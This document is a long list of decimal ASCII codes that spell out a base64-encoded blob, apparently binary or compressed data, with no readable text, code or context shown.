68 54 105 87 72 119 122 65 48 85 72 98 107 53 88 97 116 121 68 85 108 50 71 115 80 50 82 86 43 85 120 56 73 109 113 49 108 85 109 120 79 78 104 54 57 47 98 97 118 101 50 122 73 57 76 74 103 85 47 121 53 101 119 97 67 105 55 121 43 80 122 109 97 71 107 105 112 89 85 76 68 119 99 107 115 50 56 79 51 109 103 114 100 52 109 57 47 56 118 111 107 55 57 121 108 52 79 50 74 113 65 116 47 117 122 74 90 109 78 119 88 97 55 103 119 77 117 47 109 76 105 80 72 116 54 72 43 47 78 75 84 116 66 50 72 101 109 79 106 112 109 100 50 100 48 103 105 116 90 83 75 121 88 83 78 106 65 121 76 87 98 43 99 49 67 71 85 104 105 55 51 84 52 114 105 80 49 56 80 77 115 53 115 57 43 100 49 52 113 110 53 52 85 100 85 56 68 105 54 85 97 71 47 47 68 115 54 100 119 85 111 110 111 113 56 114 83 88 56 66 100 110 65 80 49 66 55 89 98 66 107 53 72 108 107 85 67 55 118 79 55 76 101 47 89 51 122 65 50 53 81 88 109 53 49 56 90 78 103 43 99 50 98 104 118 90 51 71 70 90 53 57 112 102 86 109 77 113 118 98 73 55 55 117 111 49 83 110 57 86 73 108 50 85 116 73 110 88 102 103 104 119 100 116 118 65 103 65 110 56 108 116 98 109 110 98 115 99 80 74 102 85 73 86 47 109 115 112 102 51 109 102 109 76 65 49 84 120 53 108 118 54 43 71 67 68 121 50 75 49 71 108 106 57 97 56 72 76 116 52 78 80 105 80 78 108 71 49 86 100 98 97 121 77 88 65 48 112 71 120 102 113 102 122 100 86 109 84 122 87 70 114 98 74 50 69 70 84 102 107 99 53 101 101 47 67 108 98 99 77 70 100 116 50 69 76 107 89 73 116 114 114 86 49 77 50 52 99 108 53 84 106 56 109 90 56 88 107 85 67 88 114 52 66 77 84 89 90 115 78 113 48 70 99 110 109 83 71 82 71 68 56 54 56 79 112 109 114 116 89 117 79 74 114 86 52 110 106 108 114 110 70 49 47 97 87 100 101 98 117 55 102 99 111 102 81 68 86 111 85 73 50 50 76 111 78 65 78 43 84 85 119 107 43 88 115 116 51 85 78 81 121 77 106 106 65 113 76 54 49 51 87 87 50 101 106 103 122 71 78 83 47 49 83 56 115 69 69 88 50 84 67 89 103 51 111 99 47 80 53 51 77 89 70 52 67 53 118 49 79 82 120 65 74 116 118 48 97 88 50 57 73 102 116 66 100 103 69 115 84 49 50 109 110 116 55 49 54 80 80 103 80 114 55 76 50 84 102 43 77 54 118 108 107 73 99 122 76 87 56 90 87 85 43 108 122 75 81 82 114 67 121 69 116 69 109 122 71 83 73 72 112 53 114 113 120 117 106 119 105 108 122 114 117 55 65 106 76 120 51 73 67 98 49 51 79 49 86 102 105 70 109 116 55 106 110 90 77 101 53 47 118 69 122 74 50 88 90 83 111 48 88 57 107 49 51 47 49 50 88 110 114 100 66 53 100 110 116 66 77 69 71 110 43 117 66 79 86 76 120 76 103 80 110 116 90 43 110 100 67 68 43 68 71 51 56 119 70 53 82 76 47 70 114 52 116 49 88 118 43 52 72 86 47 98 120 77 121 74 69 48 51 110 53 98 79 77 70 113 73 87 97 101 115 116 107 52 70 72 114 50 77 67 87 79 104 65 90 65 52 98 99 82 103 116 88 47 106 99 73 106 72 103 122 112 102 76 118 99 47 65 88 89 73 112 89 54 80 109 109 89 117 68 52 119 57 88 68 120 69 75 83 50 88 99 90 106 102 120 81 54 76 56 79 112 68 112 80 76 118 116 110 100 111 65 73 102 121 72 99 100 70 86 55 116 50 97 72 98 101 117 49 97 55 47 75 111 52 89 81 51 48 55 97 57 97 51 112 109 72 109 52 80 77 97 88 111 87 65 90 89 88 75 53 112 48 84 70 86 80 103 79 86 65 104 52 49 108 87 121 80 107 79 103 55 114 83 72 67 69 104 50 106 68 88 77 101 54 43 80 89 121 72 119 72 68 85 47 111 47 98 78 69 110 86 57 120 77 47 87 69 120 56 99 119 81 71 104 88 101 70 82 98 113 120 43 80 72 75 47 67 102 88 105 72 53 73 101 51 116 88 51 110 108 53 97 121 111 56 117 79 90 66 79 49 68 69 55 122 65 100 55 86 115 89 104 75 67 69 87 50 51 49 48 70 110 74 84 43 51 51 49 67 76 90 80 99 55 104 70 76 122 72 50 70 106 116 49 102 51 68 98 106 110 122 88 56 80 90 56 98 108 116 71 82 57 65 102 101 84 88 65 121 116 70 68 88 98 67 89 55 105 70 111 86 89 85 72 88 108 119 48 68 102 101 68 49 48 48 68 55 88 85 81 104 48 81 51 102 121 67 107 72 48 48 83 43 122 78 80 104 109 117 65 113 97 120 103 81 65 73 82 65 112 111 97 66 119 83 113 43 119 68 84 85 65 109 81 87 120 119 108 65 84 90 71 69 118 120 118 111 113 48 56 109 110 97 108 78 48 102 85 116 73 72 107 104 99 79 104 65 43 105 115 119 67 97 101 73 106 85 78 86 53 68 104 54 52 106 106 90 54 117 116 56 97 66 90 48 86 70 102 69 52 86 66 107 99 106 56 54 65 55 117 99 66 85 115 115 57 102 67 111 122 81 103 110 73 77 115 82 107 73 72 107 112 103 78 73 87 75 89 54 116 80 68 89 115 52 100 110 85 112 110 103 122 68 48 78 104 56 80 88 116 71 117 56 86 80 107 65 110 102 83 119 115 101 81 82 108 109 112 98 80 69 116 69 120 98 115 50 106 97 85 89 82 51 90 98 74 51 72 78 77 71 109 77 101 70 99 97 117 84 65 85 43 51 69 83 48 101 77 71 110 120 49 89 106 85 69 117 115 80 73 121 117 118 82 84 83 55 97 105 72 119 119 56 114 103 80 121 82 105 104 56 119 69 97 121 106 80 69 51 105 104 110 47 81 122 99 100 68 105 48 73 51 122 104 79 71 100 68 115 121 110 102 74 113 117 111 79 109 117 47 72 73 110 78 120 76 108 53 52 102 113 106 55 68 121 85 79 73 87 89 76 50 104 111 116 76 54 89 66 118 51 56 115 83 54 108 110 82 121 72 47 122 55 43 101 66 66 103 80 80 82 99 72 97 103 52 113 89 103 82 111 51 52 49 78 100 101 68 74 67 106 85 97 52 103 84 73 99 120 99 107 100 118 104 82 79 112 65 119 77 56 79 105 122 49 55 100 83 50 85 108 104 72 97 109 82 118 98 103 80 109 78 69 110 98 65 56 108 79 116 79 112 105 79 112 117 89 65 107 104 72 112 110 113 82 68 52 77 68 80 103 71 47 50 103 76 81 106 77 97 117 84 97 48 76 82 49 109 122 73 83 80 53 51 82 84 86 101 102 106 73 50 115 89 49 110 83 81 75 69 90 117 55 89 53 82 102 101 53 81 48 119 50 101 71 56 52 108 108 47 72 110 120 83 100 47 114 75 67 66 109 98 67 112 115 82 90 118 101 90 70 98 114 71 99 77 83 49 71 106 78 68 81 106 122 106 112 109 82 81 110 77 68 74 118 119 90 75 97 116 89 80 70 100 55 81 49 118 98 55 104 47 102 52 89 101 77 98 71 76 67 83 85 80 77 101 110 66 56 66 51 89 120 56 67 75 71 66 104 111 120 75 81 121 120 118 99 97 104 67 83 53 89 115 101 106 48 115 120 53 47 54 57 49 47 88 107 52 79 84 74 65 111 106 84 54 102 117 85 70 103 73 84 80 67 55 97 101 79 49 77 98 87 85 89 78 97 89 105 50 109 115 77 88 120 76 101 114 68 51 90 49 49 85 75 86 89 43 77 75 78 120 76 104 66 69 119 88 89 108 81 84 73 66 76 109 53 74 50 80 113 53 71 87 100 80 54 85 75 121 115 80 68 79 50 68 121 101 68 107 52 89 71 88 90 102 76 70 90 115 55 109 73 88 104 65 83 52 115 106 56 80 47 115 69 71 57 72 116 90 87 66 49 117 88 72 104 81 109 104 65 109 74 68 69 88 81 69 56 106 112 54 85 79 98 50 118 97 49 101 47 53 84 98 52 109 48 82 47 57 43 83 102 83 57 105 81 68 50 80 110 120 100 105 90 77 98 76 116 101 112 85 84 72 117 118 83 86 117 47 53 79 108 75 98 75 75 69 73 49 106 74 110 113 110 66 53 71 110 110 109 81 67 101 87 88 86 103 57 105 88 50 78 86 73 106 51 47 102 87 75 121 76 103 85 108 117 43 102 98 76 51 115 111 49 50 56 100 66 108 117 74 114 82 89 83 73 55 117 121 102 65 66 106 103 104 110 90 48 86 74 84 106 70 107 50 115 55 50 51 50 119 101 80 65 82 70 115 90 116 71 122 120 48 100 104 102 88 49 52 78 52 113 73 82 74 113 86 107 109 106 55 119 119 114 81 105 112 111 114 68 113 103 51 65 111 84 57 73 66 72 112 90 107 66 109 100 109 88 122 116 117 55 75 77 121 51 50 49 85 78 68 76 56 105 89 111 119 101 108 84 87 50 88 119 84 107 109 109 101 79 85 55 52 48 81 103 50 67 48 89 43 111 69 100 106 107 70 86 82 85 80 48 97 71 114 114 74 67 109 77 57 72 72 67 97 68 82 122 112 54 100 71 53 72 98 55 71 67 72 79 122 121 77 121 120 121 103 51 75 50 74 50 43 122 119 73 68 114 97 99 49 56 77 90 48 118 47 70 53 102 67 115 120 87 76 71 107 78 48 56 109 55 52 86 77 53 47 76 49 117 81 108 56 55 43 88 114 52 105 72 85 47 79 53 117 53 43 67 50 79 77 86 68 121 72 81 51 48 76 115 54 85 103 47 88 51 106 81 52 101 72 56 113 84 119 70 49 108 80 114 98 80 118 49 52 107 81 65 117 122 66 73 52 111 118 82 119 67 120 102 106 82 86 47 69 86 87 112 54 99 120 110 75 100 116 102 74 118 107 112 70 88 86 99 68 65 55 101 122 122 52 70 82 70 51 77 114 102 49 69 80 78 81 111 112 70 113 116 57 56 51 115 48 108 101 88 111 47 101 118 116 113 98 114 116 55 73 55 51 97 108 113 122 53 121 99 101 72 52 48 75 109 114 121 118 48 97 110 72 83 113 119 53 115 108 75 65 89 101 106 87 69 49 118 66 105 109 83 66 107 105 72 116 98 106 48 43 84 81 43 87 71 116 106 81 68 72 98 82 121 77 72 97 65 72 118 109 119 65 55 73 84 68 112 47 55 50 43 84 75 76 87 87 89 108 81 70 75 121 53 72 112 118 115 55 84 65 90 113 80 49 50 113 97 106 69 120 57 110 121 100 68 109 107 80 67 110 107 108 118 68 113 47 50 106 99 80 119 100 98 71 72 118 54 79 122 115 52 80 100 70 108 101 119 114 82 100 115 90 109 66 83 57 118 72 118 50 115 122 66 103 67 89 49 84 116 80 108 121 120 111 49 55 88 65 106 115 76 119 57 79 106 104 76 49 67 99 114 55 52 54 52 85 57 120 116 79 50 104 53 79 70 105 71 116 55 66 111 48 57 107 120 119 55 73 67 112 48 83 116 106 88 109 111 54 105 48 110 97 106 67 105 113 101 53 100 78 66 67 51 53 56 79 114 49 81 100 82 98 67 65 98 70 77 103 54 108 106 84 102 80 76 69 114 84 73 118 76 80 82 117 110 83 48 89 112 122 90 50 102 122 48 66 65 49 107 98 65 47 112 53 54 47 97 117 98 81 73 117 99 72 69 47 98 121 43 110 114 110 107 53 86 87 56 90 98 114 120 48 56 111 109 118 76 80 102 56 110 82 48 109 121 56 50 76 111 50 51 109 116 43 107 90 117 122 103 65 54 43 118 122 115 43 98 111 54 111 84 99 43 71 76 118 105 54 106 48 71 100 68 109 78 121 98 88 73 51 87 109 114 73 84 67 84 77 53 100 108 86 53 47 121 74 108 89 84 53 78 88 109 71 111 121 113 75 81 54 75 88 116 53 112 53 107 122 105 104 101 105 102 114 114 108 75 51 78 122 66 103 108 76 90 117 112 110 78 102 57 54 101 80 87 74 74 87 56 84 82 115 78 118 71 69 120 98 47 80 57 53 79 108 75 97 109 103 54 101 89 85 80 121 109 80 101 81 70 74 81 111 82 69 114 122 77 70 100 110 75 75 86 47 57 75 114 90 116 52 67 74 108 100 107 57 102 98 73 48 81 122 105 104 53 78 47 85 104 113 120 49 78 89 47 104 103 119 53 88 85 71 76 110 49 100 112 78 87 76 74 83 105 108 54 101 82 106 86 54 68 54 51 47 121 55 50 116 118 113 57 67 55 88 110 102 53 86 51 97 118 73 56 57 84 56 85 53 114 48 105 65 103 99 118 89 117 54 88 47 105 121 69 43 110 112 87 88 104 53 108 89 72 76 99 100 57 71 70 78 82 82 120 103 77 114 72 122 90 87 68 52 97 100 55 55 47 79 98 71 55 99 67 118 54 113 120 56 86 116 57 79 117 76 111 82 109 106 97 113 81 89 103 77 111 73 69 107 109 111 52 112 121 73 119 43 57 47 80 73 89 52 53 100 101 87 49 53 49 115 79 72 51 55 100 121 104 50 86 47 66 71 53 114 43 51 114 75 86 119 90 86 67 89 79 121 111 121 67 75 53 103 90 56 70 80 106 67 81 85 83 56 51 54 66 102 118 100 98 79 86 122 43 89 119 99 113 52 117 82 83 101 118 83 57 66 102 117 109 57 52 52 52 57 72 104 98 51 43 53 116 86 74 47 83 79 51 86 114 57 51 105 67 98 84 43 86 99 97 104 76 84 47 88 70 48 112 106 121 90 89 70 82 48 49 109 111 57 56 118 79 88 108 72 113 55 111 85 53 99 51 120 99 112 98 84 74 105 116 65 67 114 98 50 86 100 83 118 57 117 47 118 49 100 87 112 108 88 80 76 50 55 55 71 81 87 103 88 67 88 78 118 49 99 68 106 90 48 51 101 52 78 67 119 70 48 118 100 50 79 109 81 117 121 114 114 121 51 103 86 98 114 106 84 99 65 117 76 54 112 50 47 80 75 119 99 114 43 48 100 104 115 77 51 56 110 77 80 118 57 47 110 122 54 109 56 109 55 51 108 56 79 85 83 89 118 90 48 55 109 98 51 100 76 113 119 48 99 110 106 115 98 106 122 77 88 70 79 84 71 51 48 80 75 65 120 51 73 122 101 80 106 108 56 117 55 52 100 110 100 104 112 65 122 66 51 43 98 83 120 80 56 98 47 66 114 117 87 89 57 47 100 120 122 47 54 102 106 118 55 52 72 103 98 43 107 51 100 52 103 74 117 102 112 107 117 51 50 111 83 76 111 113 83 104 77 83 106 50 118 79 68 76 97 105 89 73 76 80 51 47 48 77 111 97 88 49 50 115 73 99 86 76 48 85 117 47 116 78 66 75 116 57 76 53 112 113 57 111 101 115 118 101 86 74 116 84 121 72 98 65 116 48 53 108 55 84 90 99 71 68 116 84 116 109 81 114 90 69 54 107 120 118 78 100 50 113 80 87 50 68 108 68 69 90 89 103 47 118 111 73 97 100 114 84 87 55 117 47 47 90 54 70 111 111 100 88 99 117 115 115 68 76 82 114 47 77 47 101 88 117 70 116 88 55 97 49 100 80 82 55 118 72 100 88 43 53 114 98 97 112 79 85 78 57 110 49 104 53 84 56 101 122 87 49 49 47 43 120 117 71 55 87 118 105 114 54 119 122 71 78 80 101 112 106 55 50 49 116 52 117 76 115 57 101 55 83 121 115 57 78 86 78 43 81 115 82 78 113 77 101 57 105 56 107 119 65 54 104 52 67 97 113 89 43 55 69 98 79 82 86 71 100 80 74 78 114 100 51 51 52 53 65 86 114 80 67 114 80 49 90 101 80 52 99 47 97 113 108 103 115 117 88 119 98 70 76 67 116 53 104 103 80 47 83 87 101 86 101 113 99 118 71 47 87 103 102 104 109 74 47 112 57 104 70 109 112 114 85 90 97 111 47 68 79 57 101 122 47 100 122 78 65 118 76 120 56 49 103 100 120 76 121 53 57 68 67 51 51 77 121 90 97 101 86 53 56 121 49 65 70 88 77 72 88 97 89 69 111 65 101 102 121 76 87 115 49 55 106 80 101 106 80 107 51 114 116 99 52 106 110 78 83 43 110 110 66 69 76 76 87 57 108 113 73 115 108 74 86 66 47 101 51 49 88 67 57 106 84 70 118 55 103 49 116 54 110 90 56 86 116 76 114 55 71 83 50 74 90 99 122 86 86 73 109 54 113 85 119 108 84 48 86 114 50 86 65 117 118 71 107 107 72 80 80 102 50 49 109 88 89 87 86 50 102 98 107 114 105 75 103 112 108 118 67 49 57 47 84 54 75 72 116 85 53 113 110 106 112 88 107 99 114 73 84 90 65 85 105 69 67 74 113 79 106 122 68 79 43 102 120 47 118 71 90 80 120 100 73 90 78 54 104 119 43 105 56 88 79 114 116 115 77 121 80 77 79 90 97 51 118 98 98 66 119 117 112 119 120 49 116 73 87 99 80 71 100 113 102 80 57 74 53 53 101 51 74 105 118 116 67 75 88 112 109 118 98 104 109 111 90 53 110 76 114 113 121 69 50 75 67 68 83 102 113 107 119 83 85 84 108 103 102 70 78 51 90 86 122 52 47 118 80 54 118 109 117 97 88 57 57 86 90 47 102 47 51 72 107 118 70 49 43 74 88 101 120 104 121 115 74 90 89 120 111 71 105 72 69 67 118 118 81 108 89 81 111 99 72 51 105 119 51 107 114 87 75 103 68 117 50 82 87 118 54 70 47 87 72 114 104 118 122 121 111 83 66 57 47 72 120 48 80 109 48 83 56 102 87 76 118 112 87 76 67 111 57 110 52 116 81 107 53 122 102 120 90 122 55 115 68 65 89 108 121 83 43 81 51 111 75 69 105 55 89 52 99 48 118 73 99 106 109 100 51 112 98 50 68 84 119 100 122 100 71 113 78 116 74 107 86 79 84 87 57 51 57 55 106 56 77 88 67 115 47 53 80 83 57 56 101 85 83 57 122 111 89 102 83 81 120 110 73 56 50 81 117 103 115 104 105 76 70 119 76 77 98 115 70 76 106 103 82 106 117 119 101 75 55 105 69 67 102 75 79 117 90 89 78 122 80 50 48 76 100 47 78 54 117 113 55 51 120 121 115 55 65 88 72 49 83 117 77 51 65 100 65 80 110 105 102 109 117 71 105 87 116 81 82 117 111 116 53 80 117 49 114 118 76 53 107 83 110 54 105 68 108 118 77 102 72 56 54 118 57 113 88 104 48 116 65 117 101 112 56 102 107 116 106 88 103 52 70 118 118 98 110 43 109 43 53 116 57 43 52 83 97 52 79 78 83 104 99 47 111 76 112 49 68 89 109 101 122 79 49 74 97 51 71 81 105 77 77 115 114 78 74 102 89 117 122 77 53 77 85 76 122 90 43 118 53 57 107 110 49 105 98 73 89 107 99 82 70 48 51 54 97 55 54 78 83 116 119 43 66 86 67 117 114 105 50 56 99 114 106 69 74 114 106 54 102 107 47 116 114 72 80 118 106 47 101 79 68 111 50 118 51 100 72 104 72 48 108 53 98 111 52 51 109 54 50 57 72 98 51 47 100 51 76 55 56 115 108 68 78 75 75 80 53 50 56 121 109 111 50 55 88 97 101 50 117 80 52 106 110 78 47 75 54 49 68 82 117 57 112 119 114 79 73 80 103 54 77 49 55 105 119 88 49 122 122 49 43 99 55 108 73 67 87 55 106 88 56 90 78 120 116 54 88 77 108 68 81 98 89 74 116 111 105 76 106 100 55 121 81 56 98 120 53 54 52 115 104 104 82 73 105 57 86 102 100 121 121 119 53 43 68 86 99 98 49 119 97 119 99 101 51 106 43 117 98 110 54 111 52 117 88 120 43 43 99 115 65 121 47 116 114 75 112 107 79 108 89 78 75 115 53 121 122 43 117 51 72 84 89 68 83 114 122 108 50 48 103 72 84 113 43 87 122 51 79 121 79 118 72 111 114 89 97 109 79 73 119 103 70 77 105 52 72 90 50 101 68 122 103 56 66 122 70 90 115 121 97 102 82 117 86 71 116 54 120 104 98 57 77 77 66 122 77 55 80 76 75 116 120 52 111 117 50 114 114 104 71 113 105 84 51 69 47 53 43 122 68 72 53 70 47 106 56 84 86 74 54 87 76 99 76 54 43 98 104 53 102 80 106 52 118 55 48 99 86 66 99 55 105 65 88 54 119 84 48 71 105 81 85 52 89 75 50 117 110 107 85 77 117 47 114 90 119 97 119 97 43 49 104 90 56 106 76 116 119 117 50 106 55 48 47 121 101 68 97 88 108 50 122 109 116 87 57 116 89 71 84 69 83 122 90 122 118 111 117 55 80 43 108 43 82 114 47 79 66 118 76 50 50 109 67 51 120 70 101 112 52 87 88 109 51 51 106 101 105 115 112 103 74 116 98 121 116 67 54 71 110 108 115 112 68 55 103 65 87 66 49 50 86 108 116 100 101 77 106 122 70 88 52 97 43 101 86 83 105 71 100 116 56 80 98 116 65 119 68 50 49 82 120 117 75 66 49 68 100 75 80 50 53 118 73 74 65 54 66 69 108 54 51 85 105 65 111 48 75 111 54 98 97 115 48 77 122 67 52 121 114 71 107 105 102 56 68 113 88 81 43 89 56 112 54 68 75 53 72 108 49 100 48 118 102 121 105 69 110 43 103 76 73 53 43 77 106 56 99 117 49 117 98 57 77 49 108 80 49 109 55 84 122 77 112 106 80 81 103 49 86 114 105 104 80 88 106 52 84 75 80 110 103 111 73 56 106 89 109 90 97 55 118 55 90 118 53 87 68 56 121 74 48 69 112 98 117 104 43 100 102 70 118 65 110 101 98 73 85 57 54 113 84 53 103 112 85 57 88 87 113 103 121 65 114 100 110 77 54 109 43 122 104 119 98 65 67 75 47 112 72 55 43 104 72 87 120 120 48 78 50 118 113 55 47 109 74 106 120 56 122 106 51 118 66 76 119 82 121 79 122 50 75 47 106 109 107 80 122 114 52 57 98 102 52 43 47 103 55 101 68 107 52 118 113 75 47 77 116 80 109 89 103 78 118 110 85 54 55 43 116 76 107 101 105 113 120 105 79 43 88 88 102 51 86 88 49 90 103 88 101 117 74 107 89 101 77 118 103 73 54 73 76 83 117 72 97 75 84 56 99 48 101 112 68 109 69 109 120 47 114 81 84 115 76 114 75 83 88 57 117 43 102 122 122 102 48 98 68 73 115 80 106 51 117 51 80 50 43 56 105 66 110 56 72 111 113 53 121 74 115 102 73 81 57 49 107 115 114 73 98 66 78 70 49 68 50 50 118 111 43 99 50 77 104 74 53 89 50 74 117 54 47 48 113 115 50 54 50 68 76 104 75 98 100 102 55 68 56 53 87 51 48 115 77 88 104 57 71 54 78 47 101 87 121 53 107 114 56 80 51 122 76 118 49 85 106 74 102 98 84 88 103 49 116 50 71 68 99 71 87 68 118 98 118 52 81 56 117 76 87 52 80 69 51 50 86 56 112 74 73 98 116 89 47 74 90 57 98 47 80 57 122 110 68 100 51 50 117 55 114 77 47 52 51 89 84 47 109 56 72 105 99 88 43 114 56 104 90 54 51 48 57 69 106 57 73 122 100 102 119 89 65 104 43 70 75 113 114 67 122 65 100 113 97 97 43 108 48 56 88 43 97 113 57 52 43 103 75 113 82 66 68 90 47 102 103 52 47 53 98 82 122 99 76 70 122 82 110 68 120 69 86 120 110 110 104 80 108 119 70 101 50 87 78 56 66 56 120 101 54 101 107 88 118 106 78 117 47 110 100 67 56 43 51 52 119 118 97 118 47 110 56 47 122 101 85 108 43 49 57 48 77 119 56 109 70 104 43 43 53 114 52 84 49 54 49 79 48 103 97 113 121 75 97 67 57 87 90 117 78 116 51 76 77 120 103 100 110 115 102 82 84 49 101 76 109 101 88 88 99 122 98 53 43 73 57 107 117 66 90 50 118 114 89 119 77 108 115 43 79 82 109 78 115 43 106 89 83 74 111 54 101 50 90 108 54 71 112 47 79 88 48 43 112 117 43 101 108 117 101 120 114 67 48 47 106 108 86 90 65 48 70 118 98 85 49 112 99 57 120 116 77 55 99 102 55 51 56 113 79 67 86 52 102 68 82 102 104 57 57 47 102 54 53 100 106 66 49 85 71 70 84 43 49 105 114 55 100 47 48 75 115 76 70 114 55 74 50 120 97 111 113 47 83 88 51 100 99 81 47 109 47 118 114 83 85 54 79 112 84 113 106 117 100 68 43 74 101 102 80 109 76 112 77 98 57 43 112 51 55 90 57 43 67 116 105 121 98 116 111 79 56 100 105 108 108 70 47 78 51 75 101 113 118 53 89 50 100 85 86 82 48 97 107 51 97 122 106 76 52 51 67 49 120 86 57 100 73 81 84 47 102 50 86 117 117 72 104 86 98 98 69 79 55 120 118 54 116 72 87 99 47 88 103 118 90 56 66 85 100 78 82 71 49 98 83 57 115 77 78 116 55 122 119 110 71 47 90 122 79 114 107 66 43 80 100 86 102 55 79 47 102 47 47 82 43 90 53 90 97 49 97 54 104 85 115 119 101 99 122 87 49 89 72 70 65 55 82 53 87 86 56 49 109 86 53 117 51 50 116 97 78 76 78 47 74 89 68 121 76 74 57 114 53 100 108 101 102 50 99 51 87 78 110 75 114 113 109 53 110 84 105 54 117 72 116 43 116 116 66 52 118 83 72 51 72 47 49 85 72 87 83 71 73 50 51 57 88 90 85 56 79 73 86 88 117 110 77 121 101 114 98 113 106 119 55 80 50 48 113 85 69 88 112 120 98 47 116 47 43 120 107 111 76 105 56 100 121 90 110 43 65 90 121 50 116 118 57 102 86 100 53 43 48 100 43 57 97 101 88 114 110 89 119 99 54 122 113 54 53 111 68 110 100 54 104 48 69 99 49 111 98 102 75 80 86 84 49 81 109 105 47 105 103 90 69 118 90 89 48 66 120 121 90 112 53 84 117 121 117 98 111 54 48 81 98 69 84 49 87 49 111 105 85 118 113 83 99 110 47 103 86 57 54 77 113 78 112 84 43 71 51 122 109 90 57 116 51 56 54 98 107 56 77 76 51 79 80 51 114 120 78 122 119 68 113 65 56 56 67 120 56 90 51 83 88 98 99 110 118 118 117 89 72 90 114 118 85 101 79 87 106 105 122 120 97 106 51 75 55 80 115 67 67 110 114 89 53 47 53 49 119 114 122 99 106 51 81 98 114 66 119 55 98 108 110 115 57 79 83 100 105 113 80 122 114 43 106 52 54 103 65 78 107 52 43 78 82 116 79 122 122 83 106 87 118 103 87 69 115 122 47 50 51 79 55 57 52 118 88 109 43 75 119 105 117 108 100 107 77 122 57 99 47 119 105 122 51 57 80 116 56 122 105 68 76 115 82 56 49 80 115 70 80 89 101 87 101 103 43 76 78 102 121 120 109 120 86 103 89 105 74 86 90 76 101 112 47 73 57 69 56 76 83 50 52 65 67 75 55 88 117 113 118 119 100 70 108 49 86 49 110 86 102 101 111 119 43 83 103 71 118 80 52 89 79 110 121 50 84 97 80 109 81 70 113 54 47 88 52 57 117 47 86 68 48 54 100 56 117 105 111 55 111 55 79 69 56 85 97 71 49 69 86 67 80 118 102 118 90 116 83 50 105 105 116 72 66 86 57 75 66 83 100 103 49 49 47 105 65 116 69 105 74 56 73 113 79 43 79 74 66 101 47 88 69 70 56 102 108 52 53 100 117 68 115 51 116 75 82 108 110 112 97 49 115 65 111 100 90 54 49 73 76 81 109 107 74 89 72 53 88 121 99 65 104 73 85 66 104 67 115 106 68 71 119 104 84 85 78 72 68 65 114 78 84 89 76 108 84 117 80 69 118 73 81 72 79 89 111 84 89 80 101 70 66 83 48 112 89 114 107 54 120 67 103 86 75 89 85 83 112 105 77 69 90 107 69 67 98 50 99 67 75 84 50 101 107 103 75 52 76 111 84 53 80 85 109 47 73 115 49 90 104 111 114 112 71 70 69 111 111 102 85 99 85 86 68 66 50 104 43 76 120 120 56 75 66 68 68 65 68 43 99 73 51 118 116 106 84 109 106 81 100 43 101 107 116 80 97 69 73 113 122 71 50 115 75 79 109 68 82 103 79 105 104 83 79 50 116 69 111 72 81 88 70 73 77 119 75 86 107 84 116 118 70 99 89 72 71 111 112 73 79 71 89 88 86 90 71 47 105 114 76 83 48 104 57 74 81 83 71 119 110 69 107 97 105 102 74 104 68 55 97 89 67 121 116 105 74 111 84 79 88 51 81 57 79 97 75 122 68 71 120 88 72 110 72 74 114 106 106 110 69 57 56 56 89 107 56 71 116 57 89 111 67 108 108 84 86 113 109 110 71 99 79 67 84 69 120 121 115 52 117 53 54 47 108 108 122 107 49 104 53 97 102 108 120 85 115 117 74 119 85 77 122 120 76 86 70 86 76 67 66 73 78 54 118 85 67 113 74 122 78 75 108 71 83 101 101 109 73 55 76 106 100 106 120 111 102 50 80 69 105 68 89 109 69 76 85 110 49 77 79 78 101 99 43 89 104 102 107 99 82 106 72 67 87 51 50 49 71 78 82 80 84 97 76 99 52 100 108 73 48 55 99 70 55 105 109 111 53 108 104 50 75 107 81 74 52 105 100 77 117 89 85 106 48 107 97 71 81 101 111 109 71 119 85 97 66 106 112 88 104 65 108 105 105 67 50 74 112 77 75 83 85 80 78 108 50 107 121 109 43 49 107 70 69 86 86 66 78 69 87 49 83 55 77 53 73 114 105 98 65 55 73 103 115 73 78 48 71 107 113 69 79 118 84 79 66 111 83 104 90 117 109 109 47 80 115 116 65 83 88 109 113 67 86 87 69 71 48 109 73 52 114 78 81 48 115 85 65 109 103 118 79 50 67 57 52 86 100 106 83 73 105 108 84 69 82 74 76 103 53 97 89 88 81 100 81 71 72 90 112 74 76 80 109 65 78 119 79 65 54 77 48 71 73 72 119 76 47 76 105 89 122 78 116 82 120 105 67 103 69 121 83 70 43 66 105 81 51 70 82 66 80 67 104 90 82 69 70 66 102 98 49 120 122 83 75 67 110 115 54 111 84 81 101 75 78 122 88 122 56 67 80 73 66 121 120 76 88 52 109 77 78 82 76 98 55 97 50 119 79 78 88 83 78 107 99 121 82 89 48 73 107 67 112 97 111 115 111 112 120 83 86 71 109 98 98 112 81 83 104 73 98 116 53 65 108 72 98 87 90 85 75 78 77 71 90 90 98 87 57 82 80 105 81 97 85 103 52 89 48 115 85 101 50 99 89 86 77 50 90 71 101 112 122 48 108 56 66 75 98 51 54 121 111 121 105 117 109 49 81 81 43 83 68 77 76 121 105 105 112 85 112 113 108 86 114 76 89 73 110 112 98 83 110 108 65 48 87 101 118 71 84 74 89 55 113 53 121 97 78 86 66 112 68 76 103 66 79 88 76 85 112 114 106 104 101 67 111 71 110 65 76 74 106 113 50 70 110 71 97 108 68 83 48 72 81 107 79 77 117 84 104 90 107 56 85 87 103 73 67 76 66 52 108 81 84 98 67 114 67 90 75 100 66 76 109 98 115 97 101 43 73 113 104 121 120 50 97 79 84 69 116 110 78 82 110 119 111 98 72 57 71 65 119 52 85 76 100 97 108 120 99 102 71 115 105 111 117 88 80 68 65 110 122 98 83 111 105 90 105 57 71 69 52 51 110 98 113 47 55 51 54 81 112 83 72 48 65 74 52 113 75 90 50 117 114 118 67 69 107 121 78 81 119 112 80 74 87 51 113 120 43 52 87 105 113 66 90 67 43 74 77 79 90 47 48 85 101 56 65 104 72 81 110 115 107 65 111 107 69 112 110 48 90 69 99 119 97 97 103 104 65 116 79 83 69 107 116 88 79 110 113 103 57 114 54 100 87 109 120 78 56 79 71 76 81 68 52 73 65 84 78 119 52 116 70 118 122 89 54 65 82 101 52 50 99 65 72 118 108 104 76 48 110 112 117 102 70 48 72 68 74 66 119 57 80 102 69 56 97 81 107 87 85 110 69 99 102 87 70 66 84 103 90 85 120 77 122 89 90 120 73 49 89 89 57 86 87 68 121 88 53 78 70 81 70 101 110 87 70 120 71 74 88 76 81 79 105 84 119 53 99 106 85 122 116 87 112 115 69 53 90 76 48 65 107 83 49 53 98 65 54 72 122 72 86 98 48 114 81 48 117 101 67 86 103 115 116 109 116 115 55 88 111 69 43 54 116 74 69 52 117 108 54 115 101 67 105 55 79 83 109 102 66 81 108 73 104 52 70 107 43 80 73 116 89 51 70 89 87 73 51 97 55 50 74 74 81 56 111 119 88 106 65 47 88 55 69 102 77 67 